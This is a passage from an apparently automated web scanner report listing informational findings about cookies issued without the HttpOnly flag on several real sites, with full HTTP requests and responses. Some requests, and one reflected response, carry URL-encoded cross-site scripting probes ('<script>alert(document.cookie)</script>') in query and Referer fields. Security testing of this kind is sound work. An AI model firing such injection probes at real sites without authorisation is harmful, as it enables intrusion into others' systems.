Location: /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?dcsredirect=1&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1295921924.19297; expires=Fri, 22-Jan-2021 02:18:44 GMT; path=/dcs1djgf3c87ozzcdiy9h9817_3i3h
P3P: CP="NON DSP COR NID TAIa OUR NOR STA,policyref="http://www.autocheck.com/w3c/p3p.xml"
Last-Modified: Thu, 18 Dec 2008 10:22:42 GMT
ETag: "1658028-2b-45e4f929c8080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.599. http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webtrends.autocheck.com
Path:   /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1OTIxOTI0LjE5Mjk3AAAAAAAAAAABAAAAAgAAAAQzPk0EMz5NAQAAAAEAAAAEMz5NBDM+TQAAAAA-; path=/; expires=Fri, 22-Jan-2021 02:18:44 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?dcsredirect=1&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: webtrends.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1295921924.19297; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
Location: /usr/local/webtrends/sdc/util/content/wt_dcs.gif
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1OTIxOTI0LjE5Mjk3AAAAAAAAAAABAAAAAgAAAAQzPk0EMz5NAQAAAAEAAAAEMz5NBDM+TQAAAAA-; path=/; expires=Fri, 22-Jan-2021 02:18:44 GMT
Expires: Tue, 1 Jan 1980 01:01:01 GMT
P3P: CP="NON DSP COR NID TAIa OUR NOR STA,policyref="http://www.autocheck.com/w3c/p3p.xml"
Last-Modified: Thu, 18 Dec 2008 10:22:42 GMT
ETag: "1658028-2b-45e4f929c8080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.600. http://widget.mibbit.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.mibbit.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • backend=wbe01.mibbit.com; path=/; domain=widget.mibbit.com; expires=Tue, 25-Jan-2011 18:02:59 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: widget.mibbit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:02:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: backend=wbe01.mibbit.com; path=/; domain=widget.mibbit.com; expires=Tue, 25-Jan-2011 18:02:59 GMT
Location: http://wbe01.mibbit.com/
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wbe01.mibbit.com/">here</a>.</p>
<hr>
<a
...[SNIP]...

14.601. http://world-cup-news.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=c4ce7beb6b80cbdc2e05ed76224f380c; expires=Tue, 01-Feb-2011 14:03:19 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:19 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=c4ce7beb6b80cbdc2e05ed76224f380c; expires=Tue, 01-Feb-2011 14:03:19 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054788589477539
X-Served-In: 0.055518865585327
X-Served-By: h04
Content-Length: 42861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.602. http://world-cup-news.net/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=c3cf7dbd05dce1901bd59f98734e4e26; expires=Tue, 01-Feb-2011 14:03:30 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:30 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk
Set-Cookie: tm_identity=c3cf7dbd05dce1901bd59f98734e4e26; expires=Tue, 01-Feb-2011 14:03:30 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00025510787963867
X-Served-In: 0.95033502578735
X-Served-By: h03
Content-Length: 0


14.603. http://world-cup-news.net/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=2837f266a1df23b4f77d1a4b9e1852a6; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:40 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet
Set-Cookie: tm_identity=2837f266a1df23b4f77d1a4b9e1852a6; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001380443572998
X-Served-In: 1.6935610771179
X-Served-By: ded2061
Content-Length: 0


14.604. http://world-cup-news.net/story/1411828812/top-10-world-cup-twitter-trends-chart

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1411828812/top-10-world-cup-twitter-trends-chart

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=d4a5fe7a848bdce39798e03f7bda6654; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1411828812/top-10-world-cup-twitter-trends-chart HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:40 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1411828812/top-10-world-cup-twitter-trends-chart
Set-Cookie: tm_identity=d4a5fe7a848bdce39798e03f7bda6654; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00014495849609375
X-Served-In: 1.6823539733887
X-Served-By: h03
Content-Length: 0


14.605. http://world-cup-news.net/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=b277a2b83d1e0bfb440624ef26d1c4c6; expires=Tue, 01-Feb-2011 14:03:36 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:36 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports
Set-Cookie: tm_identity=b277a2b83d1e0bfb440624ef26d1c4c6; expires=Tue, 01-Feb-2011 14:03:36 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00011301040649414
X-Served-In: 1.7047410011292
X-Served-By: ded2060
Content-Length: 0


14.606. http://world-cup-news.net/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=f2ac14a1a2966370f1aba65e8a7e5204; expires=Tue, 01-Feb-2011 14:03:29 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:29 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training
Set-Cookie: tm_identity=f2ac14a1a2966370f1aba65e8a7e5204; expires=Tue, 01-Feb-2011 14:03:29 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001218318939209
X-Served-In: 1.3096618652344
X-Served-By: h02
Content-Length: 0


14.607. http://world-cup-news.net/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=ab42539c881d21d1f6e470ff9bbbd01a; expires=Tue, 01-Feb-2011 14:03:35 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16 HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:35 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16
Set-Cookie: tm_identity=ab42539c881d21d1f6e470ff9bbbd01a; expires=Tue, 01-Feb-2011 14:03:35 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00010514259338379
X-Served-In: 1.5907509326935
X-Served-By: h00
Content-Length: 0


14.608. http://world-cup-news.net/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=f1e92053a836534b6f3cbe7d94dbf69a; expires=Tue, 01-Feb-2011 14:03:38 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:38 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot
Set-Cookie: tm_identity=f1e92053a836534b6f3cbe7d94dbf69a; expires=Tue, 01-Feb-2011 14:03:38 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00016593933105469
X-Served-In: 1.3061110973358
X-Served-By: h01
Content-Length: 0


14.609. http://world-cup-news.net/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=a1d1e4b8c0ebb5bd0bdc338521f10b62; expires=Tue, 01-Feb-2011 14:03:26 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:26 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record
Set-Cookie: tm_identity=a1d1e4b8c0ebb5bd0bdc338521f10b62; expires=Tue, 01-Feb-2011 14:03:26 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001680850982666
X-Served-In: 0.55980706214905
X-Served-By: h01
Content-Length: 0


14.610. http://world-cup-news.net/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=37e764f9e766e864acef056d8324ed36; expires=Tue, 01-Feb-2011 14:03:42 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:42 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports
Set-Cookie: tm_identity=37e764f9e766e864acef056d8324ed36; expires=Tue, 01-Feb-2011 14:03:42 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 9.2029571533203E-5
X-Served-In: 1.1478500366211
X-Served-By: h02
Content-Length: 0


14.611. http://world-cup-news.net/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=4af6ad630988cb3d4007a3e22f0d2c55; expires=Tue, 01-Feb-2011 14:03:25 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:25 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa
Set-Cookie: tm_identity=4af6ad630988cb3d4007a3e22f0d2c55; expires=Tue, 01-Feb-2011 14:03:25 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00011491775512695
X-Served-In: 1.0151119232178
X-Served-By: h01
Content-Length: 0


14.612. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • Coyote-2-a0f0083=a0f021f:0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

14.613. http://www.addthis.com/feed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • pub=deleted; expires=Sun, 24-Jan-2010 16:03:18 GMT; path=/
  • Coyote-2-a0f0083=a0f021f:0; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /feed.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=deleted; expires=Sun, 24-Jan-2010 16:03:18 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7588
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

14.614. http://www.aerotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerotrader.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:22:56 GMT
  • TSef43b4=dda16b828fd3667079886639fd1d974f3651df908a5a2b674d3e0c18759e864aee104e3b; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:22:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:22:56 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=dda16b828fd3667079886639fd1d974f3651df908a5a2b674d3e0c18759e864aee104e3b; Path=/
Content-Length: 58457

<!-- dstolweb05-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Aircraft for Sale, find used or new Cessna, Beechcraft at Aero Trader</title>
   <meta http-equiv="Cache-Control" content="no-cache" />
   <m
...[SNIP]...

14.615. http://www.alistapart.com/articles/alternate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alistapart.com
Path:   /articles/alternate/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • exp_last_visit=980553804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
  • exp_last_activity=1295913804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
  • exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%22%2Farticles%2Falternate%2F%22%3B%7D; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/alternate/ HTTP/1.1
Host: www.alistapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: mobify=0; expires=Mon, 24-Jan-2011 18:03:24 GMT; path=/; domain=.alistapart.com
Set-Cookie: exp_last_visit=980553804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_last_activity=1295913804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%22%2Farticles%2Falternate%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <title>A List Ap
...[SNIP]...

14.616. http://www.apture.com/js/apture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 21:11:11 GMT
Last-Modified: Mon, 24 Jan 2011 21:11:11 GMT
Etag: "4ad7d91e6131ca80d32f15ef4593339c"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1604
Date: Mon, 24 Jan 2011 21:11:11 GMT
Connection: close


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5
...[SNIP]...

14.617. http://www.atvtraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:23:56 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

